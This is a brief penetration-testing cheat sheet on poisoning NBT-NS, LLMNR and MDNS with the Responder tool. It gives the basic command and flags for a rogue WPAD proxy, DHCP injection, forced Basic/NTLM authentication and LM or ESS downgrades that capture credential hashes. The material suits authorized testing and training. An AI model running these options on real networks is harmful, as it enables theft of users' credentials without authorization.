NBT-NS/LLMNR/MDNS
Exploit
Last updated
Last updated
responder -I eth0 [options]
OPTIONS
-w Start A WPAD Rogue Proxy Server
-d Inject A WPAD Server In The DHCP Response
-b Return A Basic HTTP Authentication (Allows Plaintext)
-F Force NTLM/Basic Authentication When Retrieving wpad.dat
--lm Force LM Hashing Downgrade For Older Machines
--disable-ess Force ESS Downgrade
--analyze Run Responder In Analyze Mode